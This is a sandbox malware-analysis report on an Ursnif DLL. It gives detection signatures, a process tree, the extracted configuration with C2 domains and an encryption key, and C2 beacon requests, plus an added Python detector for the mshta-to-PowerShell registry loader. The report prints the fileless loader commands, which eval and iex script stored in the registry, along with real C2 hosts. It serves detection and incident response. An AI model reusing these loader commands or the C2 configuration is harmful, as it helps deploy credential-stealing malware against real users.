
Windows Analysis Report 2770174.dll

Overview

General Information

Sample Name:2770174.dll
Analysis ID:444656
MD5:bce6371b0aed287193d8f90f2b1b4441
SHA1:2fc4f4c523c701dba03cf1f1e6971e61dc1efcb3
SHA256:4b631043c6ff0a2fd24591b0564f7b3fc59c46319646b27cec4cf24349227d36
Tags:dll

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Sigma detected: Encoded IEX
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Hooks registry keys query functions (used to hide registry keys)
Machine Learning detection for sample
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5292 cmdline: loaddll32.exe 'C:\Users\user\Desktop\2770174.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 5336 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2770174.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5324 cmdline: rundll32.exe 'C:\Users\user\Desktop\2770174.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 5288 cmdline: regsvr32.exe /s C:\Users\user\Desktop\2770174.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 5300 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 2376 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5812 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 2904 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17432 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 476 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:82960 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 1844 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17442 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 2564 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17454 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 3020 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:82990 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 1240 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17474 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 2904 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:83006 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4732 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:148488 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5144 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:83022 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5804 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17508 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5684 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:83042 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 1884 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17518 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 4972 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:17528 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 2812 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5300 CREDAT:83060 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 5276 cmdline: rundll32.exe C:\Users\user\Desktop\2770174.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • mshta.exe (PID: 5332 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Pyhe='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pyhe).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3076 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: Ursnif

{
  "RSA Public Key": "1mPXe+HluarwW4R5yJj7kX696atmf6B7a6Jg5mZJ5i3sbRT19R7vT9mKoTtyIRImiHldxTU8DG3omytA0iEqz9hnZgVFnIpVKjKYSqpF7qVSkNASqDhbMdx0CqPxwgtnM3yHiXHYSYrxlGineE5/W0Lx89hsKcfonC8W/kvncnBH4KqUVMOPQeg/25xF11Xm",
  "c2_domain": ["outlook.com", "mail.com", "taybhctdyehfhgthp2.xyz", "thyihjtkylhmhnypp2.xyz"],
  "botnet": "5456",
  "server": "12",
  "serpent_key": "10291029JSRABBIT",
  "sleep_time": "10",
  "CONF_TIMEOUT": "20",
  "SetWaitableTimer_value": "0",
  "DGA_count": "10"
}

Yara Overview

Memory Dumps

Rule: JoeSecurity_Ursnif  Description: Yara detected Ursnif  Author: Joe Security  (the full report lists 34 matching dumps; the first five are shown here)
  • 00000000.00000003.452621123.0000000002508000.00000004.00000040.sdmp
  • 00000002.00000003.340867138.0000000005278000.00000004.00000040.sdmp
  • 00000003.00000003.358484652.0000000005168000.00000004.00000040.sdmp
  • 00000000.00000003.452413152.0000000002508000.00000004.00000040.sdmp
  • 00000003.00000003.476285292.0000000004F6C000.00000004.00000040.sdmp

Sigma Overview

System Summary:

All four rules below matched the same process-start event (Source: Process started; ProcessId 3076, ParentProcessId 5332):
  Image / NewProcessName / OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command / CommandLine / ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
  CommandLine|base64offset|contains: (empty)
  ParentImage: C:\Windows\System32\mshta.exe
  ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Pyhe='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pyhe).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'

  • Sigma detected: Encoded IEX (author: Florian Roth)
  • Sigma detected: MSHTA Spawning Windows Shell (author: Michael Haag)
  • Sigma detected: Mshta Spawning Windows Shell (author: Florian Roth)
  • Sigma detected: Non Interactive PowerShell (author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements))
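The process tree and the four Sigma matches above describe one chain: mshta.exe runs an inline HTA that RegReads the value MarkChart under HKCU\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E and evals it, and the powershell.exe it spawns reads the sibling value UtilDiagram, ASCII-decodes it and hands it to iex, so the second-stage script never exists as a file. The Python below is an added example, not part of the Joe Sandbox report: it runs two Sigma-style checks over constructed process-creation records whose PIDs and command lines are copied from the process tree (the record layout, rule names and regexes are my own assumptions), flags the mshta-to-shell parent/child relationship, and extracts the key GUID and value names from the command lines so a responder knows which registry values to export before the host is cleaned.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon EID 1 / 4688 style); the layout is an assumption."""
    pid: int
    parent_pid: int
    image: str
    command_line: str


# Child images that count as a "Windows shell" when their parent is mshta.exe.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# A command line that both evaluates script text (iex / eval) and reads it from the registry.
_EVAL_RE = re.compile(r"\b(?:iex|invoke-expression|eval)\b", re.IGNORECASE)
_REGREAD_RE = re.compile(r"\bregread\s*\(|\b(?:gp|get-itemproperty)\s+'HKCU:", re.IGNORECASE)

# The AppDataLow key as written inside the HTA (JScript string, backslash runs of any length,
# value name after the key) or in PowerShell (HKCU: drive form, value as a property after "')").
_REG_RE = re.compile(
    r"HKCU(?::|\\+)Software\\+AppDataLow\\+Software\\+Microsoft\\+"
    r"([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})"
    r"(?:\\+([A-Za-z0-9_]+)'|'\)\.([A-Za-z0-9_]+))",
    re.IGNORECASE,
)

# Constructed sample: PIDs and command lines copied from the report's process tree; the
# loaddll32/cmd/rundll32/conhost records are controls that must not fire either rule.
EVENTS = [
    ProcEvent(5292, 1000, r"C:\Windows\System32\loaddll32.exe",
              r"loaddll32.exe 'C:\Users\user\Desktop\2770174.dll'"),
    ProcEvent(5336, 5292, r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2770174.dll',#1"),
    ProcEvent(5324, 5336, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe 'C:\Users\user\Desktop\2770174.dll',#1"),
    ProcEvent(5332, 1000, r"C:\Windows\System32\mshta.exe",
              r"""'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Pyhe='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pyhe).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'"""),
    ProcEvent(3076, 5332, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"""'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))"""),
    ProcEvent(5160, 3076, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]


def analyze(events):
    """Return one finding per matched rule; a single process may trigger both."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.parent_pid)
        child_name = e.image.rsplit("\\", 1)[-1].lower()
        # Rule 1: mshta.exe spawning a shell (what the "Mshta Spawning Windows Shell" rules key on).
        if parent and parent.image.lower().endswith("mshta.exe") and child_name in SHELLS:
            findings.append({"rule": "mshta_spawns_shell", "pid": e.pid, "parent_pid": parent.pid})
        # Rule 2: script text read from the registry and evaluated in the same command line.
        if _EVAL_RE.search(e.command_line) and _REGREAD_RE.search(e.command_line):
            m = _REG_RE.search(e.command_line)
            findings.append({
                "rule": "registry_resident_script",
                "pid": e.pid,
                "guid": m.group(1).upper() if m else None,
                "value": (m.group(2) or m.group(3)) if m else None,
            })
    return findings


def registry_values_to_acquire(findings):
    """(GUID, value name) pairs to export from HKCU before remediation removes them."""
    return sorted({(f["guid"], f["value"]) for f in findings
                   if f["rule"] == "registry_resident_script" and f["guid"]})


if __name__ == "__main__":
    found = analyze(EVENTS)
    for f in found:
        print(f)
    print(registry_values_to_acquire(found))
```

The second rule deliberately requires both an evaluation primitive and a registry read in one command line; either alone is common in administration scripts, and the GUID-named key under AppDataLow is what ties the two processes to the same stash.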

Jbx Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
  Source: 2770174.dll  Avira: detected
Found malware configuration
  Source: 0.2.loaddll32.exe.10000000.2.unpack  Malware Configuration Extractor: Ursnif (the extracted configuration is listed in full under Malware Configuration above)
Machine Learning detection for sample
  Source: 2770174.dll  Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
  Source: 0.2.loaddll32.exe.10000000.2.unpack  Avira: Label: TR/Crypt.XPACK.Gen8
  Source: 3.2.rundll32.exe.10000000.3.unpack  Avira: Label: TR/Crypt.XPACK.Gen8

Uses 32bit PE files
  Source: 2770174.dll  Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Tries to load missing DLLs
  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe  File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

HTTPS traffic detected (Source: unknown; all TLS 1.2; server:443 -> 192.168.2.5:client port, 47 connections):
  104.20.185.68    ports 49699, 49700
  151.101.1.44     ports 49713, 49714, 49715, 49716, 49717, 49718
  82.165.229.87    ports 49745, 49765, 49766, 49767, 49768, 49825, 49826
  82.165.229.59    ports 49746, 49747, 49769, 49770, 49771, 49772, 49827, 49828
  142.250.180.206  ports 49755, 49756, 49782, 49783, 49789, 49790, 49831, 49832
  82.165.229.16    ports 49759, 49760, 49795, 49796, 49801, 49802, 49837, 49838
  195.20.250.115   ports 49763, 49764
  82.165.229.54    ports 49797, 49798, 49799, 49800, 49835, 49836

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  Source: Traffic  Snort IDS 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B):
    192.168.2.5:49724 -> 40.97.116.82:80
    192.168.2.5:49803, :49805, :49814, :49815, :49817, :49821 -> 45.90.58.179:80
  Source: Traffic  Snort IDS 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F):
    192.168.2.5:49803, :49805, :49814, :49815, :49819 -> 45.90.58.179:80
Performs DNS queries to domains with low reputation
  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe  DNS query: taybhctdyehfhgthp2.xyz (8 queries)
IP address seen in connection with other malware
  Source: Joe Sandbox View  IP Address: 40.97.148.226
  Source: Joe Sandbox View  IP Address: 52.97.170.34
Internet Provider seen in connection with other malware
  Source: Joe Sandbox View  ASN Name: GREENFLOID-ASUA
JA3 SSL client fingerprint seen in connection with other malware
  Source: Joe Sandbox View  JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
HTTP traffic detected (Source: global traffic). Every /jdraw/ request below carries the same headers:
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Connection: Keep-Alive

  • GET /jdraw/yH91aKnpTrUgeTTXk_2FC/UNtUKwQdb1VcS_2B/GaoM_2Fyx_2BE1f/CKkjJtxjumUCxy08c3/hEyqk7y0R/Lv9aFeVgtQQx8QD9pW5d/Ac07adghbVZgEftTXAe/6L6pB6BmU2Y7k8ESiCzmDb/Z4dkw_2BAKquP/hA_2BwCK/3iTjiCeJZZSpLKXArjcyss9/OwKlQvPM9fHtt6/WpI0i7.crw HTTP/1.1  Host: outlook.com
  • GET /jdraw/GTAeWl1dTEKsPGzboniA9C/3TQSND4hN4q8j/tJxnEgfP/uW5VGwHzywLraum6aAQWdJy/1RqIzWDCCX/qrcTQot2XuPIeam7w/8XDXQ5cif7RJ/1_2B3PVmQx5/nHKK8uT65nNyIl/JeFpPVHIxWMVXvseH_2FD/YH70V7tTLImM6Joz/2I1VGAIxwkkbz7Z/4EmL4AYi/6QglyA.crw HTTP/1.1  Host: mail.com
  • GET /jdraw/_2Faxv8_2Bu0S355431/zWBmIqRqQnvMB_2FKOk6CG/NwnPAjKDdicU7/LyyqKz0o/YfBYTeGYFQwkbZMyJ8naD46/LAJf_2B0RU/3xv7VkvLo_2BH32z2/0GV2mzuC7wB9/KQWi8z52zYq/laCh5k_2F_2FsN/gFzjneWKury1hVqDQnliR/azK5qDi4jLH99wYz/G9Hdx13SInuD3gF/73zT6HN_2B6msVs0lU/EuYlN_2BC7WR/i.crw HTTP/1.1  Host: taybhctdyehfhgthp2.xyz
  • GET /favicon.ico HTTP/1.1  Host: taybhctdyehfhgthp2.xyz  (this request differs: Accept: */*; Accept-Encoding: gzip, deflate; User-Agent as above; no Accept-Language; Connection: Keep-Alive; Cookie: PHPSESSID=t8ig2lm7e99tl9ioed8m825st0; lang=en)

  The following eight requests to taybhctdyehfhgthp2.xyz additionally send Cookie: lang=en; PHPSESSID=t8ig2lm7e99tl9ioed8m825st0
  • GET /jdraw/tR4LnoSVINT1f2c/0VvJfJtFJ0fvpQScRR/CPWVnO7Ig/8xymBr8_2BV2MPJj4WbJ/plMEUslrrtyCH_2Bwhq/1CDE4hgwgyY_2Bfw3s_2F1/UxPXHIDsYEwNA/DWJu4vAO/gkXIRDv7pcl_2FYyiYW0p52/VZjd1pdZUq/nUDfT2o7A87Q2yEgN/bEZSgdLSHpEB/Y8DoqjUm9asX_2BdG/q.crw HTTP/1.1
  • GET /jdraw/6egkLxw_2B/0MDk_2F6Dttk_2BDL/PeMCvV_2FKSI/4qVuvEJzX6I/FapijqFJTF_2Fb/KhTAv5JxUk1yx17bklmA1/d0ce84VGmC4XToZ3/TiJp7oqlVeIG5y4/hFv5_2BNvMTr_2BeEi/G1O6zP7eh/h0jyonPucpxshjr38gHc/mUt_2Bbr2dZAiwNrJ6q/V3apeuqs4sJwa7IUzmg12g/qV5g.crw HTTP/1.1
  • GET /jdraw/WzEyJLB3xlLsnabkhWyV0S/yaPNrrtbEg_2F/gaaPNPvk/KT7taNsNnsmIKyasgTZ0UAG/nQc7Y04rHd/Wf9d711z2fDYWnZSZ/I5gtE5194Pn8/54FQXS9Bp0p/Yr0NIxUfu5Fay8/_2FlA1aXKnd2v_2B9oARj/_2Fx_2FChvh5vpN4/OMwk_2BosEsV5ld/sSRuMcQjMYnxoDOxLX/9QI7NxpfE/WeR0iN16/80Qd2J2g/G.crw HTTP/1.1
  • GET /jdraw/_2F4Q_2FnvV/BpomczM_2B2Jkp/FRSRsBJeoQn3RBrurQkGr/rDwzJqou7P_2BXVD/nyA2CFklxFPwVQh/Yho06_2FbaOGMgTxMt/wv24AfIjN/0MFgIcSL6gEiPqujKV_2/FBuSaCXg7gU09XOKs6c/4flUb9QPzKFwKqbjV_2FMz/mqc6yG0M3rYrC/7N85LJjr/tu_2BqIUaqz1VBst_2F35QW/3.crw HTTP/1.1
  • GET /jdraw/p5RR5qqGgi5cTLPxy/2iFqCZAtdge9/_2B0gp3GesH/Xr71XWjGQYQuWa/hA9AKk4_2BjgWwj5Y0S8K/QFWsxQXH1nBjETKY/5OHlicPcimNIcL6/z4pHXf1uPEPssBLv8K/mnGWtLd2A/uaW_2Bl6KqHoNDaU_2Bh/DiOvILfU9m_2BExEsIT/5_2B5_2BSmOr5E2GYDUf9Y/mDnzrYQJR/mky.crw HTTP/1.1
  • GET /jdraw/2dmHXVLFpoxZkp/lRnXRf4rg4uMzmmWxeqRM/HUrKxMJE8mnsaP3a/BSrsCvSsG_2BS6o/EetdeEq5gQ_2FyXySX/Ubse8b9so/m_2FVXqZKmYn0vbRxn_2/BpcuM8syJiHvDzsFPwE/VcmFcijyALhTLZxPULLl94/yvHhbYt_2F3zs/MiwgrxH9/_2F06LcLdvAsYVoK_2FJUaB/om5CWM0I.crw HTTP/1.1
  • GET /jdraw/gtqnX1_2BBrthQ/u3Ow9U77gyB4yz7FWcMqW/MB7b6_2BOONkcuHq/pp1MQOLvSN1p_2B/FV7Pm6a31d2J5lSN_2/BzGSBLJoW/mkH_2B1SqUGsLgri21vM/sTm8rqFhIKFyjhSMnfS/eOIuSlx61lzuK1AdQtpcLd/ecP_2F2TO_2Bj/KaylSIXS/u6E6oRIpMJVadVClzcxwIS_/2BHj1Xmv/hc.crw HTTP/1.1
  • GET /jdraw/WEqyJQ4Nq2nQ9ndVH/biMw8nJM827T/xrW3osP_2Bm/N3LwbnFmUNMeEO/_2FGDUp6Oi5jXD7I8Ab8U/gK4SwCYPiUPEkaUo/PrkNmh92vqxkb0v/PCnqPml9BaZFVRBIe_/2B22S8HAh/d9Tx35KtPfkXAbAsIuzf/2WiITh1H39IL9oWAn14/Ato1qcOoaQdDf8WbLtN5nh/4DNa.crw HTTP/1.1
Source: de-ch[1].htm.6.dr  String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: gtm[1].js.20.dr  String found in binary or memory: "arg1":"https:\/\/www.facebook.com\/mail.com" equals www.facebook.com (Facebook)
Source: msapplication.xml0.4.dr  String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x1b02aec4,0x01d772ae</date><accdate>0x1b02aec4,0x01d772ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.4.dr  String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x1b02aec4,0x01d772ae</date><accdate>0x1b0a4fe4,0x01d772ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.4.dr  String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1b0a4fe4,0x01d772ae</date><accdate>0x1b0a4fe4,0x01d772ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.4.dr  String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1b0a4fe4,0x01d772ae</date><accdate>0x1b0a4fe4,0x01d772ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.4.dr  String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x1b0a4fe4,0x01d772ae</date><accdate>0x1b0a4fe4,0x01d772ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.4.dr  String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x1b0a4fe4,0x01d772ae</date><accdate>0x1b0a4fe4,0x01d772ae</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.6.dr  String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: potec.core.min[2].js.20.dr  String found in binary or memory: eh=function(){var a=z.O(U('\x3cdiv class\x3d"mod-konami"\x3e\x3cdiv class\x3d"vd"\x3e\x3ciframe width\x3d"640" height\x3d"360" src\x3d"https://www.youtube.com/embed/SrLZgP-OR6s" frameborder\x3d"0" allowfullscreen\x3e\x3c/iframe\x3e\x3cdiv class\x3d"close"\x3e\x3c/div\x3e\x3c/div\x3e\x3c/div\x3e').toString());z.O("body").append(a);var b=z.O(".mod-konami");b.width();b.find(".close").b("click",function(){function a(){b.removeNode()}z.T(b,"show");window.Modernizr.csstransitions||a();b.b("transitionend", equals www.youtube.com (Youtube)
            Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
            Source: de-ch[1].htm.6.drString found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 
